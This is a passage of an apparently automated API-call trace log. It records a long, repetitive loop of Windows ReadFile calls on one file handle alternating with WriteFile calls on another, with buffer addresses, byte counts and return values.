lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.705] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.706] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.706] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.707] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.707] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.708] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.708] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.709] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x191, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.710] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.710] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.711] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x218, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.711] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.712] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.712] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.713] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.713] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.713] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.714] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.714] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.715] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.715] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.716] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.716] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.717] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.717] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.718] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.718] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.719] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.719] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fe, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.719] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.720] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.720] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.721] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.721] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.722] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x227, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.728] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.728] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.729] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.729] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.730] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.730] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x263, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.731] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.731] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.731] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.732] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.733] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.733] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x261, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.733] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.734] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.734] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.735] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.735] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.736] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.736] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.737] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.737] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.738] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.738] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.739] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.739] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.740] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.740] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.741] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.741] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.742] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x346, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.742] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.743] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.743] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.744] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.744] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x336, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.745] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.745] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x353, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.746] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.746] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.747] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.747] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.748] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.748] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.749] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.749] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.750] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.750] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.751] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.751] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.751] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.752] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.752] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.753] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.753] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.754] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x269, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.754] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.755] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.755] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.756] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.756] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.757] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.757] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 